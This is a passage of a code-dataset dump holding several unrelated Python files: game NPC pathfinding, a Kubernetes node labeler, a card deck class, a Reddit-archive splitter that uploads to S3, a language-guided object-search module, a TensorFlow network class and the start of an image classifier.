player):\n\t\tself.state = state\n\t\tif self.state == PATROL_STATE:\n\t\t\tself.patrol()\n\n# A* with errors\n\tdef set_path(self, destination):\n\t\tself.tile_location = self.get_tile_location()\n\t\t# Set of nodes already evaluated\n\t\tself.closed_set = []\n\t\t# Set of currently discovered nodes, not evaluated yet\n\t\tself.open_set = [self.tile_location]\n\t\t# Contain the most efficient previous steps\n\t\tself.came_from = {}\n\t\t# cost from going from start to node\n\t\tself.g_score = {}\n\t\tfor i in range (0, MAPHEIGHT):\n\t\t\tfor j in range (0, MAPWIDTH):\n\t\t\t\tself.g_score[(j,i)] = sys.maxint\n\t\tself.g_score[self.tile_location] = 0\n\t\t# total current cost from getting start to finish\n\t\tself.f_score = {\n\t\t\tself.tile_location : math.hypot(destination[0]-self.tile_location[0], destination[1]-self.tile_location[1])\n\t\t}\n\t\twhile len(self.open_set) != 0:\n\t\t\tcurrent_tile = (0,0)\n\t\t\tcurrent_value = MAPWIDTH*MAPHEIGHT\n\t\t\tfor node in self.open_set:\n\t\t\t\tif self.f_score[node] < current_value:\n\t\t\t\t\tcurrent_value = self.f_score[node]\n\t\t\t\t\tcurrent_tile = node\n\n\t\t\tif current_tile == destination:\n\t\t\t\tself.reconstruct_path(current_tile)\n\t\t\t\treturn\n\n\t\t\tself.open_set.remove(current_tile)\n\t\t\tself.closed_set.append(current_tile)\n\n\t\t\tself.explore_neighbors(current_tile, destination)\n\n\tdef reconstruct_path(self, current_tile):\n\t\tself.total_path = [current_tile]\n\t\tfor key, value in self.came_from.iteritems():\n\t\t\tif current_tile not in self.came_from:\n\t\t\t\tbreak\n\t\t\tcurrent_tile = self.came_from[current_tile]\n\t\t\tself.total_path.append(current_tile)\n\t\tself.total_path.remove(current_tile)\n\n\n\tdef explore_neighbors(self, current_tile, destination):\n\t\tneighbors = []\n\t\t# left_tile\n\t\tneighbors.append((current_tile[0]-1, current_tile[1]))\n\t\t# right_tile\n\t\tneighbors.append((current_tile[0]+1, current_tile[1]))\n\t\t# above_tile\n\t\tneighbors.append((current_tile[0], current_tile[1]-1))\n\t\t# below_tile\n\t\tneighbors.append((current_tile[0], current_tile[1]+1))\n\n\t\t# check every neighbor\n\t\tfor neighbor in neighbors:\n\t\t\tif neighbor in self.closed_set:\n\t\t\t\tcontinue\n\n\t\t\tif neighbor not in self.open_set:\n\t\t\t\t# If there is not an object there\n\t\t\t\tif self.game_map.tile_has_object(neighbor) == False:\n\t\t\t\t\tself.open_set.append(neighbor)\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\n\t\t\t# distance from start to neighbor\n\t\t\tg_dist = math.hypot(current_tile[0]-neighbor[0], current_tile[1]-neighbor[1])\n\t\t\ttentative_g_score = self.g_score[current_tile] + g_dist\n\n\t\t\tif tentative_g_score >= self.g_score[neighbor]:\n\t\t\t\tcontinue # Not a good path to take\n\n\t\t\t# Possibly a good path, so map\n\t\t\tself.came_from[neighbor] = current_tile\n\t\t\tself.g_score[neighbor] = tentative_g_score\n\n\t\t\th_score = math.hypot(destination[0] - neighbor[0], destination[1]-neighbor[1])\n\t\t\tself.f_score[neighbor] = self.g_score[neighbor] + h_score\n\n\n\t# Movement using tiles\n\tdef move_to_location(self, location):\n\t\tif (self.direction == LEFT or self.direction == NA):\n\t\t\tif (self.rect.x + self.rect.width)/TILESIZE > location[0]:\n\t\t\t\tself.update(True, LEFT)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tself.direction = NA\n\n\t\tif (self.direction==RIGHT or self.direction==NA):\n\t\t\tif self.rect.x/TILESIZE < location[0]:\n\t\t\t\tself.update(True, RIGHT)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tself.direction = NA\n\n\t\tif (self.direction == UP or 
self.direction == NA):\n\t\t\tif (self.rect.y + self.rect.height)/TILESIZE > location[1]:\n\t\t\t\tself.update(True, UP)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tself.direction = NA\n\n\t\tif (self.direction == DOWN or self.direction == NA):\n\t\t\tif self.rect.y/TILESIZE < location[1]:\n\t\t\t\tself.update(True, DOWN)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tself.direction = NA\n\n\tdef patrol(self):\n\t\t# If nothing in route, then return\n\t\tif len(self.route) <= 0:\n\t\t\treturn\n\n\t\t# Speed the NPC is moving\n\t\tself.speed = 2\n\t\tself.change_timer = 8\n\n\t\t# Consists of elements in the route list\n\t\tdestination = (self.route[self.route_index][0]/TILESIZE, self.route[self.route_index][1]/TILESIZE)\n\n\t\t# If no path is set, then set a path\n\t\tif self.set == False:\n\t\t\tself.set = True\n\t\t\tself.set_path(destination)\n\n\t\t# Getting the next tile to move to\n\t\troute_len = len(self.total_path)\n\t\tif self.set_index == False:\n\t\t\tself.astar_index = route_len - 1\n\t\t\tself.set_index = True\n\t\tlocation = self.total_path[self.astar_index]\n\t\tif self.rect.x/TILESIZE != location[0] or self.rect.y/TILESIZE != location[1]:\n\t\t\tself.moving = True\n\t\t\tself.move_to_location(location)\n\t\telse:\n\t\t\tself.tile_location = (self.rect.x/TILESIZE, self.rect.y/TILESIZE)\n\t\t\tself.moving = False\n\n\t\t# If we get to the route location and we are no longer moving,\n\t\t# go to the next location\n\t\tif self.astar_index > 0 and self.moving == False:\n\t\t\tself.astar_index -= 1\n\t\telif self.astar_index <= 0 and self.moving == False:\n\t\t\tif self.route_index < len(self.route)-1:\n\t\t\t\tself.route_index += 1\n\t\t\telse:\n\t\t\t\tself.route_index = 0\n\t\t\tself.set = False\n\t\t\tself.set_index = False\n\n\tdef stop(self):\n\t\tself.speed = 0\n\t\tself.update(False, self.direction)\n","sub_path":"Phase2/Classes/NPC.py","file_name":"NPC.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"31885398","text":"from ec2 import Ec2\nfrom kubernetes import Kubernetes\nfrom labeler.node_labeler import NodeLabeler\nfrom os import environ\nfrom time import sleep\n\n\ndef main(labeler):\n \n while True:\n labeler.label_nodes()\n sleep(2)\n\n\nif __name__ == '__main__':\n\n vpc_id = environ['VPC']\n region = environ['REGION']\n prefix = environ['LABEL_PREFIX']\n\n infra = Ec2(region, vpc_id)\n kube = Kubernetes()\n labeler = NodeLabeler(infra, kube, prefix)\n\n main(labeler)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"520542248","text":"__author__ = \"Sean Grogan\"\n__credits__ = [\"Sean Grogan\"]\n__license__ = \"Attribution-NonCommercial-ShareAlike 4.0 International\"\n__version__ = \"1.0\"\n__maintainer__ = \"Sean Grogan\"\n__email__ = \"sean.grogan@gmail.com\"\n__status__ = \"Production\"\nfrom Card import *\nimport random # for the random choice of drawn cards\n\n\nclass DeckOfCards:\n \"\"\"A deck of cards class specifically created for my poker simulation\n \"\"\"\n def __init__(self, number_of_decks=1, jokers=False):\n self.deck = []\n self.base_deck = []\n self.number_of_decks = number_of_decks\n self.seed = None\n suits = ['s', 'c', 'd', 'h']\n digits = [2, 3, 4, 5, 6, 7, 8, 9, 'T', 'J', 'Q', 'K', 'A']\n k = 2\n for j in digits:\n for i in suits:\n c = Card(j, i, k)\n k += 1\n self.base_deck.append(c)\n for i in 
range(number_of_decks):\n            for j in range(len(self.base_deck)):\n                self.deck.append(self.base_deck[j])\n        if jokers:\n            self.base_deck.append(Card('red', 'JOKER'))\n            self.base_deck.append(Card('black', 'JOKER'))\n\n    def __len__(self):\n        return len(self.deck)\n\n    def draw_card(self):\n        \"\"\"Draws a card from the deck. Returns the card. If the deck is empty returns False.\n        \"\"\"\n        if len(self.deck) == 0:\n            return False\n        return self.deck.pop()\n\n    def burn_card(self):\n        \"\"\"Burns a card from the deck. Poker terminology for drawing a card that isn't in play.\n        Returns True if it successfully 'burns the card'. If the deck is empty returns False.\n        \"\"\"\n        if len(self.deck) == 0:\n            return False\n        self.deck.pop()\n        return True\n\n    def shuffle(self):\n        \"\"\"Void method that shuffles a deck in place using python's built-in RNG.\n        \"\"\"\n        self.deck = []\n        for i in range(self.number_of_decks):\n            for j in range(len(self.base_deck)):\n                self.deck.append(self.base_deck[j])\n        random.shuffle(self.deck)\n\n    def random_seed(self, seed=None):\n        \"\"\"Sets the random seed of the random stream.\n        \"\"\"\n        if seed is not None:\n            random.seed(seed)\n\n    def remove_card(self, card):\n        \"\"\"An unused beta-edition method that removes a card from the deck.\n        \"\"\"\n        for i in range(len(self.deck)):\n            a = self.deck[i].number\n            b = card.number\n            c = self.deck[i].suit\n            d = card.suit\n            if a == b and c == d:\n                self.deck.pop(i)\n                return True\n        return False\n\n\"\"\"unit testing\"\"\"\nif __name__ == '__main__':\n    deck = DeckOfCards()\n    deck.shuffle()\n    for i in deck.deck:\n        print(i, ':', i.key, ' : ', ((i.key - 2) // 4) + 2)\n\n    for i in range(53):\n        print(deck.draw_card())\n\n    print(len(deck))\n    deck.shuffle()\n    print(len(deck))\n\n    pass","sub_path":"DeckOfCards.py","file_name":"DeckOfCards.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"748850","text":"import bz2\nimport configparser\nimport datetime\nimport itertools\nimport json\nimport logging\nimport lzma\nimport pathlib\nimport os\nimport shutil\nimport sys\nimport time\nimport urllib3\nimport zstandard\nimport redis\n\nimport boto3\nimport bs4\n\n# Load configuration file.\nconfig_parser = configparser.SafeConfigParser()\nconfig_parser.read('config.ini')\n\n# Collect inputs.\nec2_name = sys.argv[1]\ncontent_type = sys.argv[2]\ndownload_start_pos = sys.argv[3]\ndownload_end_pos = sys.argv[4]\nblocksize = int(sys.argv[5])\n\n# EC2 parameters.\nregion = config_parser.get('EC2_Download', 'Region')\nec2_instance_keys = config_parser.get('EC2_Download', 'Instances').split(',')\nprint(ec2_instance_keys)\n\n# S3 parameters. \ns3_bucket_key = config_parser.get('S3','Bucket')\ncontent_type_list = config_parser.get('Elasticsearch', 'Indices').split(',')\n\n# SQS parameters.\nsqs_stream_key = config_parser.get('SQS','Queue')\n\n# Data repository URL.\ndata_source = config_parser.get('Pushshift', 'URL') \ndata_repo_url = f\"{data_source}/{content_type}\"\n\n# S3 directory keys.\ns3_log_dir_key = f\"{content_type}/logs\"\ns3_raw_dir_key = f\"{content_type}/raw_data\"\ns3_processed_dir_key = f\"{content_type}/processed_data\"\n\n# Define and make local directories. 
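(split_data holds the chunked output, logs holds the run logs.) 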
Data should automatically be removed from\n# here.\nparent_dir = pathlib.Path(__file__).parent.resolve()\noutput_dir = parent_dir / \"reddit\" / content_type / \"split_data\"\nlog_dir = parent_dir / \"reddit\" / content_type / \"logs\" \n\noutput_dir.mkdir(parents=True, exist_ok=True)\nlog_dir.mkdir(parents=True, exist_ok=True)\n\n# Logging configuration\nlog_date_format = config_parser.get('Download_Script', 'Log_Date_Format')\nlog_filename = f\"{datetime.datetime.now().strftime(log_date_format)}_{ec2_name}_split_download.log\"\nlog_file_path = log_dir / log_filename\nlog_format = config_parser.get('Download_Script', 'Log_Content_Format')\nlogging_level = logging.WARNING\n\nlogging.basicConfig(filename=log_file_path.resolve().as_posix(),filemode='a',\n format=log_format,\n datefmt=log_date_format,\n level=logging_level)\n\n# Collects link URLs.\ndef web_scrape_links(data_source_url):\n http = urllib3.PoolManager()\n response = http.request('GET', data_source_url)\n soup = bs4.BeautifulSoup(response.data, 'lxml')\n link_list = []\n gib = 0\n print(\"Retrieving link URLs.\")\n for row in soup.findAll('table')[0].tbody.findAll('tr'):\n a = row.findAll('a')[2]\n link_url = data_source_url + a[\"href\"][1:]\n ext = os.path.splitext(link_url)[1]\n if ext in {\".bz2\", \".xz\", \".zst\"}:\n link_list.append(link_url)\n bytesize = int(a.text.replace(',', ''))\n gib += bytesize / 1073741824\n return link_list, gib\n\n\n# Defines what subset of links to download.\ndef set_download_window(start, end, max_length):\n if end == \"end\" or int(end) > max_length:\n end = max_length\n elif int(end) > max_length:\n end = max_length\n else:\n end = int(end)\n if start == \"start\":\n start = 0\n elif int(start) < 0:\n start = 0\n else:\n start = int(start)\n return start, end\n\n\n# Downloads a given link URL.\ndef url_download(url,destination_dir):\n http = urllib3.PoolManager()\n filename = url.rsplit('/', 1)[-1]\n ext = os.path.splitext(url)[1]\n destination_path = (destination_dir / filename).with_suffix(ext)\n with http.request('GET', url, preload_content=False) as r:\n with destination_path.open('wb') as output_file: \n shutil.copyfileobj(r, output_file)\n print(f\"Downloading {filename} from {url} to {destination_path.resolve().as_posix()}.\\n\")\n return destination_path\n\n\n# Check if a file exists in S3.\ndef check_s3_key(s3_bucket, file_key):\n print(f\"Checking if {file_key} exists in {s3_bucket.key}.\")\n loaded = False\n objs = list(s3_bucket.objects.filter(Prefix=file_key))\n if len(objs) == 1 and objs[0].key == file_key:\n loaded = True\n if loaded:\n print(\"File found.\")\n else:\n print(\"File not found.\")\n return loaded\n\nclass S3Exception(Exception):\n pass\n\nclass S3CantUploadException(S3Exception):\n pass\n\nclass S3CantVerifyUploadException(S3Exception):\n pass\n\n# Checks if a file has been completely uploaded to S3. 
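It polls the SQS event queue first and then falls back to a direct S3 key lookup. 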
\ndef check_if_uploaded(sqs_queue, s3_bucket, file_key, max_wait_time=.3):\n    wait_time = 0\n    while wait_time < max_wait_time:\n        try:\n            for json_message in sqs_queue.receive_messages():\n                message = json.loads(json_message.body)\n                try:\n                    if (message[\"Records\"][0][\"s3\"][\"object\"][\"key\"] == file_key):\n                        return\n                except KeyError:\n                    continue\n        except:\n            pass\n        wait_time += .1\n        time.sleep(.1)\n        print(\"Waiting.\")\n    last_try = check_s3_key(s3_bucket, file_key)\n    if last_try:\n        return\n    else:\n        raise S3CantVerifyUploadException(f\"Can't verify if {file_key} was uploaded.\")\n\n\n# Uploads a file to S3 and verifies the upload has completed.\ndef upload_to_s3(s3_bucket, dir_key, input_path, redis_db=None, sqs_queue=None):\n    file_key = f\"{dir_key}/{input_path.name}\"\n    try:\n        print(f\"Pushing [{file_key}] to the s3 bucket [{s3_bucket.name}].\\n\")\n        s3_bucket.upload_file(input_path.as_posix(), file_key)\n        if redis_db is not None:\n            print(f\"Updating Redis with key [{input_path.name}]\")\n            redis_db.hset(input_path.name, \"status\", \"unread\")\n            print(\"Updated\")\n    except Exception as e:\n        raise S3CantUploadException(str(e))\n    return file_key\n\n\n# Splits a block of bz2 compressed data, unzips it, and formats it to be \n# suitable json for bulk Elasticsearch ingestion. The processed chunk is then\n# compressed by bz2. \ndef bz2_to_bz2(decompressor, bz_block):\n    longline = decompressor.decompress(bz_block).decode(\"utf-8\")\n    longline = longline.split(\"\\n\", 1)[1]\n    longline = longline.rsplit(\"\\n\", 1)[0]\n    longline = longline.encode()\n    bz_data = bz2.compress(longline)\n    return bz_data\n    \n# Takes a whole bz2 compressed file and splits it to many. The smaller files\n# are pushed to S3 and then deleted locally.\ndef zip_one_to_many(input_path, output_dir, blocksize, s3_bucket=None, redis_db=None):\n    chunk = 0\n    header = input_path.stem\n    output_list = []\n    ext = input_path.suffix\n    with input_path.open(mode=\"rb\") as input_file:\n        z = bz2.BZ2Decompressor()\n        for block in iter(lambda: input_file.read(blocksize), b''):\n            filename = f\"{header}_{chunk}{ext}\"\n            output_path = output_dir / filename\n            dir_key = f\"{s3_processed_dir_key}/{header}\"\n            with output_path.open(mode=\"wb\") as output_file:\n                zipped_chunk = bz2_to_bz2(z, block)\n                output_file.write(zipped_chunk)\n            upload_to_s3(s3_bucket, dir_key, output_path, redis_db)\n            output_path.unlink()\n            chunk += 1\n    logging.getLogger().setLevel(logging.INFO)\n    logging.info(f\"{filename} successfully split into {chunk} files.\")\n    logging.getLogger().setLevel(logging.WARNING)\n    upload_to_s3(s3_bucket, s3_log_dir_key, log_file_path)\n    return output_list\n\n\ndef s3_download(s3_bucket, file_key, output_path):\n    source = file_key\n    destination = output_path.resolve().as_posix()\n    print(f\"Downloading [{source}] to [{destination}].\")\n    s3_bucket.download_file(source, destination)\n    print(\"Download complete.\")\n\n\nredis_endpoint = \"\"\nredis_db = redis.Redis(\n    host=redis_endpoint,\n    port=6379\n    )\n\n\n# This is the main block that downloads and splits the compressed bz2 files.\nif __name__ == \"__main__\":\n    # Create AWS resource instances.\n    s3_resource = boto3.resource(\"s3\", region_name=region)\n    sqs_resource = boto3.resource(\"sqs\", region_name=region)\n\n    s3_bucket = s3_resource.Bucket(s3_bucket_key)\n    sqs_queue = sqs_resource.get_queue_by_name(QueueName=sqs_stream_key)\n    \n    # Accumulate links to download\n    link_list,_ = web_scrape_links(data_repo_url)\n    start, end = set_download_window(\n        download_start_pos, download_end_pos, len(link_list)\n    )\n    \n    
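# bookkeeping for the main loop; the skip thresholds below come from config.ini\n    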
download_pos = start\n successful_downloads = 0\n start_time = time.time()\n skipped = 0\n skip_doc_threshold = int(config_parser.get('Download_Script', 'Skip_Doc_Threshold'))\n skip_chunk_threshold = int(config_parser.get('Download_Script','Skip_Chunk_Threshold'))\n for link_url in itertools.islice(link_list, start, end):\n # Download compressed files from data repository and unzip.\n try:\n #zipped_file_path = url_download(link_url, output_dir)\n filename = link_url.rsplit('/', 1)[-1].rsplit('.', 1)[0] + \".bz2\"\n if \"v2_\" in filename:\n filename = filename.replace(\"v2_\", \"\")\n file_key = f\"{s3_raw_dir_key}/{filename}\"\n print(\"filekey\", file_key)\n zipped_file_path = output_dir / filename\n \n s3_download(s3_bucket, file_key, zipped_file_path)\n \n zip_one_to_many(zipped_file_path, output_dir, blocksize, s3_bucket, redis_db)\n zipped_file_path.unlink()\n logging.getLogger().setLevel(logging.INFO)\n logging.info(f\"Uploaded {zipped_file_path.resolve().as_posix()}.\")\n logging.getLogger().setLevel(logging.WARNING)\n except Exception as e:\n if skipped < skip_doc_threshold:\n logging.warning(f\"Trouble splitting {zipped_file_path.resolve().as_posix()}. Skipping file.\")\n skipped += 1\n continue\n else:\n logging.warning(f\"Trouble splitting {zipped_file_path.resolve().as_posix()}.\")\n logging.warning(\"Too many files are being skipped. Terminating download.\")\n sys.exit() \n end_time = time.time()\n delta = end_time - start_time\n print(f\"Download completed in {delta} seconds.\")\n logging.getLogger().setLevel(logging.INFO)\n logging.info(f\"Download completed in {delta} seconds\")\n upload_to_s3(s3_bucket, s3_log_dir_key, log_file_path)\n log_file_path.unlink()\n \n","sub_path":"preprocessing-scripts/one_to_many.py","file_name":"one_to_many.py","file_ext":"py","file_size_in_byte":10205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"149550491","text":"'''\n Created by awandzel on 11/01/18.\n'''\nimport copy\n\n\nclass LanguageCommand:\n languageToRoom = {}\n languageToClass = {}\n classToRooms = {}\n languageObservation = {}\n\n def __init__(self, Rooms, objectClasses):\n self.Rooms = Rooms\n self.objectClasses = objectClasses\n\n def setVocabularyforClass(self):\n self.languageToClass[(\"mug\", \"mugs\")] = 0\n self.languageToClass[(\"book\", \"books\")] = 1\n self.languageToClass[(\"key\", \"keys\")] = 2\n self.languageToClass[(\"remote\", \"remotes\")] = 3\n self.languageToClass[(\"person\", \"persons\")] = 4\n\n def setVocabularyForRooms(self):\n self.languageToRoom[\"kitchen\"] = 0\n self.languageToRoom[\"library\"] = 1\n self.languageToRoom[\"storage\"] = 2\n self.languageToRoom[\"livingroom\"] = 3\n self.languageToRoom[\"robotics\"] = 4\n self.languageToRoom[\"classroomA\"] = 5\n self.languageToRoom[\"classroomB\"] = 6\n self.languageToRoom[\"classroomC\"] = 7\n self.languageToRoom[\"classroomD\"] = 8\n\n # Language command parsing structure:\n # for c classes : extract sequential pair (class, )\n def parseLanguageCommand(self, command, randomRoom = None):\n self.setVocabularyforClass()\n self.setVocabularyForRooms()\n\n #initialize mapping from class to room to []\n for c in range(len(self.objectClasses)):\n self.classToRooms[c] = []\n\n # e.g. 
mug in or and book in \n currentClass = \"\"\n words = command.split()\n for w in words:\n\n for c in self.languageToClass:\n if w in c:\n currentClass = self.languageToClass[c]\n if self.languageToClass[c] >= len(self.objectClasses): raise Exception(\"Error: referenced class exceeds number of object classes\")\n\n if w in self.languageToRoom:\n # Randomize room for simulation\n if randomRoom is not None:\n self.classToRooms[currentClass].append(randomRoom.randrange(self.Rooms.numberOfRooms))\n else:\n self.classToRooms[currentClass].append(self.languageToRoom[w])\n if self.languageToRoom[w] >= self.Rooms.numberOfRooms: raise Exception(\"Error: referenced room exceeds number of rooms\")\n\n #for not mentioned classes assume all rooms (no information)\n for c in self.classToRooms:\n if not self.classToRooms[c]:\n self.classToRooms[c] = [i for i in range(self.Rooms.numberOfRooms)]\n\n\n def translateToObservation(self, psi):\n numberOfObjects = 0\n\n #iterate over all referenced classes\n for c in self.classToRooms:\n normRefRooms, normNotRefRooms = self.normalizationConstant(self.classToRooms[c])\n objObservation = self.objectLanguageObservation(self.classToRooms[c], psi, normRefRooms, normNotRefRooms)\n\n #ground to object i\n for o in range(self.objectClasses[c]):\n self.languageObservation[numberOfObjects] = copy.deepcopy(objObservation)\n numberOfObjects += 1\n\n #for each set of referenced rooms count number of locations in each\n def normalizationConstant(self, referencedRooms):\n normRefRooms = normNotRefRooms = 0\n for r in range(self.Rooms.numberOfRooms):\n if r in referencedRooms:\n normRefRooms += len(self.Rooms.roomToLocationsMapping[r])\n else:\n normNotRefRooms += len(self.Rooms.roomToLocationsMapping[r])\n return normRefRooms, normNotRefRooms\n\n\n # for each room: if referenced: 1.0 - psi / #roomsReferenced, else: psi / #roomsNotReferenced\n def objectLanguageObservation(self, referencedRooms, psi, normRefRooms, normNotRefRooms):\n objObservation = {}\n for r in range(self.Rooms.numberOfRooms):\n for l in self.Rooms.roomToLocationsMapping[r]:\n #only translate into observation if informative (i.e. 
not uniform)\n                if len(referencedRooms) < self.Rooms.numberOfRooms:\n                    prob = (1.0 - psi) / normRefRooms if r in referencedRooms else psi / normNotRefRooms\n                else:\n                    prob = 1.0\n                objObservation[l] = prob\n        return objObservation\n\n    # iterate over each object / location and perform a pairwise multiplication w/ languageObservation\n    def beliefUpdate(self, beliefPrior):\n        updatedBelief = {}\n\n        for o in range(len(beliefPrior)):\n            updatedObjBelief = {}\n            normalization = 0.0\n\n            for l in beliefPrior[o]:\n                prob = beliefPrior[o][l] * self.languageObservation[o][l] # pairwise multiplication\n                normalization += prob\n                updatedObjBelief[l] = prob\n\n            for l in updatedObjBelief: updatedObjBelief[l] /= normalization\n            updatedBelief[o] = updatedObjBelief\n        return updatedBelief\n","sub_path":"Multi_Object_Search/Core/LanguageCommand.py","file_name":"LanguageCommand.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"100159762","text":"# coding: utf-8\n\n# Overview: \"DeepNeralNetworkClass\"\n# Feature name: \"deep learning class\"\n# Last modified: 2017/12/12\n'''\n    A neural network wrapped up as a class\n\n'''\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.utils import shuffle\n\n\nclass DNN(object):\n\n    # initialization\n    def __init__(self,n_in,n_hiddens, n_out):\n        self.n_in = n_in\n        self.n_hiddens = n_hiddens\n        self.n_out = n_out\n        self.weights = []\n        self.biases = []\n        self.x_ = None\n        self.t_ = None\n        self.y_ = None\n        self.keep_prob = None\n        self.acuracy_ = None\n        self._sess = None\n        self._history = {\n            'loss' : [],\n            'acuracy' : [],\n            'class':[]\n        }\n        tf.reset_default_graph()\n    \n    # weight setup\n    def weight_variable(self,shape,name=None):\n        initial = tf.truncated_normal( shape , stddev = 0.01)\n        return tf.Variable(initial,name=name)\n\n\n    # bias setup\n    def bias_variable(self,shape,name=None):\n        initial = tf.zeros(shape)\n        return tf.Variable(initial,name=name)\n\n\n    # model definition\n    def interface(self,x,keep_prob):\n        # input layer to hidden layer / hidden layer to hidden layer\n        for i , n_hidden in enumerate(self.n_hiddens):\n            if i == 0:\n                # input layer\n                input = x\n                input_dim = self.n_in\n            else:\n                # hidden layer / hidden layer\n                input = output\n                input_dim = self.n_hiddens[i - 1]\n            \n            self.weights.append(self.weight_variable([input_dim,n_hidden],name='W_{}'.format(i)))\n            self.biases.append(self.bias_variable([n_hidden],name='b_{}'.format(i)))\n            \n            \n            h = tf.nn.relu(tf.matmul(input,self.weights[-1]) + self.biases[-1])\n            output = tf.nn.dropout(h , keep_prob)\n        \n        \n        # hidden layer / output layer\n        self.weights.append(self.weight_variable([self.n_hiddens[-1],self.n_out],name='W_{}'.format(len(self.n_hiddens))))\n        self.biases.append(self.bias_variable([self.n_out],name='b_{}'.format(len(self.n_hiddens))))\n        \n        # compute the output\n        # y = tf.nn.softmax(tf.matmul(output,self.weights[-1]) + self.biases[-1])\n        # implement with a sigmoid function instead:\n        # y = tf.nn.sigmoid(tf.matmul(output,self.weights[-1]) + self.biases[-1])\n        # use the hyperbolic tangent instead:\n        # y = tf.nn.tanh(tf.matmul(output,self.weights[-1]) + self.biases[-1])\n        y = tf.nn.relu(tf.matmul(output,self.weights[-1]) + self.biases[-1])\n        return y\n\n\n    # loss function definition\n    def loss(self , y ,t):\n        # cross_entropy = tf.reduce_mean(-tf.reduce_sum(t * tf.log(y),reduction_indices=[1]))\n        # cross_entropy = - tf.reduce_sum(t * tf.log(y)+ ( 1- t )*tf.log(1-y))\n        cross_entropy = tf.reduce_sum(tf.square(y - t))\n        return cross_entropy\n    \n\n    # training algorithm definition\n    def training(self,loss):\n        #optimaizer = tf.train.GradientDescentOptimizer(0.01)\n        optimaizer = tf.train.AdagradOptimizer(0.01)\n        \n        train_step = optimaizer.minimize(loss)\n        return train_step\n\n\n    # evaluation of the training\n    def 
acuracy(self,y,t):\n        # correct_prediction = tf.equal(tf.argmax(y,1),tf.argmax(t,1))\n        correct_prediction = tf.equal(tf.to_float(tf.greater(y,0.5)),t)\n        acuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32)) \n        return acuracy\n\n\n\n    # training procedure\n    def fit(self,X_train,Y_train,epochs=100,batch_size=100,p_keep=0.5,verbose=1,path=None):\n        x = tf.placeholder(tf.float32, shape=[None,self.n_in],name='input')\n        t = tf.placeholder(tf.float32, shape=[None,self.n_out])\n        keep_prob = tf.placeholder(tf.float32) \n\n        self.x_ = x\n        self.t_ = t\n        self.keep_prob = keep_prob\n\n\n        y = self.interface(x,keep_prob)\n        self.y_ = y \n        loss = self.loss(y,t)\n        train_step = self.training(loss)\n        acuracy = self.acuracy(y,t)\n        self.acuracy_ = acuracy\n\n        init = tf.global_variables_initializer()\n        sess = tf.Session()\n        sess.run(init)\n\n        self._sess = sess\n        \n        # set up the model saver\n        saver = tf.train.Saver() \n        \n\n        N_train = len(X_train)\n        n_batches = N_train // batch_size\n        \n        for epoch in range(epochs):\n            X_,Y_ = shuffle(X_train,Y_train)\n            \n            for i in range(n_batches):\n                start = i * batch_size\n                end = start + batch_size\n                \n                \n                \n                sess.run(train_step,feed_dict = {\n                    x : X_[start:end],\n                    t : Y_[start:end],\n                    keep_prob : p_keep\n                })\n            \n            loss_ = loss.eval(session=sess,feed_dict = {\n                x : X_train,\n                t : Y_train,\n                keep_prob : 0.5\n            })\n            \n            \n            acuracy_ = acuracy.eval(session=sess,feed_dict = {\n                x : X_train,\n                t : Y_train,\n                keep_prob : 0.5\n            })\n\n            self._history['acuracy'].append(acuracy_)\n            self._history['loss'].append(loss_)\n            \n            if verbose:\n                print('epoch:',epoch,' loss:',loss_,' acuracy:',acuracy_)\n        \n        # save the model\n        saver.save(sess, path + \"/model.ckpt\") \n        return self._history\n\n\n    # evaluate the training result\n    def evaluate(self,X_test,Y_test):\n        return self.acuracy_.eval(session=self._sess,feed_dict = {\n            self.x_ : X_test,\n            self.t_ : Y_test,\n            self.keep_prob : 0.5\n        })\n\n\n    # get the predicted probabilities from the trained model\n    def getrate(self,X_test):\n        prob = self.y_.eval(session=self._sess,feed_dict = {\n            self.x_ : X_test,\n            self.keep_prob : 1.0\n        })\n        self._sess.close()\n        return prob\n\n\n    # restore the trained model and run a prediction\n    def getRestore(self,X_test,path):\n        tf.reset_default_graph()\n        x = tf.placeholder(tf.float32, shape=[None,self.n_in],name='input')\n        t = tf.placeholder(tf.float32, shape=[None,self.n_out])\n        keep_prob = tf.placeholder(tf.float32) \n\n        self.x_ = x\n        self.t_ = t\n        self.keep_prob = keep_prob\n\n\n        y = self.interface(x,keep_prob)\n        loss = self.loss(y,t)\n        train_step = self.training(loss)\n        acuracy = self.acuracy(y,t)\n        self.acuracy_ = acuracy\n\n        saver = tf.train.Saver()\n        sess = tf.Session()\n        self._sess = sess\n        \n        saver.restore(sess, \"./\" + path + \"/model.ckpt\") \n        result_prob2 = y.eval(session=sess,feed_dict = {\n            x : X_test,\n            keep_prob : 1.0\n        })\n        return result_prob2\n","sub_path":"source/batch/machinelearn/relu_DNN/DNN_class.py","file_name":"DNN_class.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546491460","text":"from keras.preprocessing.image import img_to_array\nfrom keras.models import load_model\nfrom keras import backend as K\nimport numpy as np\nimport imutils\nimport cv2\nimport tempfile\nimport boto3\nimport os\nfrom azure.storage.blob import BlockBlobService, PublicAccess\nfrom google.cloud import storage\n\n\nclass NotSanta:\n\n    def classify(self, model_name, image_path):\n        \n        # load the trained convolutional neural network\n        model = load_model(model_name)\n\n        # load the image\n        image = cv2.imread(image_path)\n        orig = image.copy()\n\n        # 
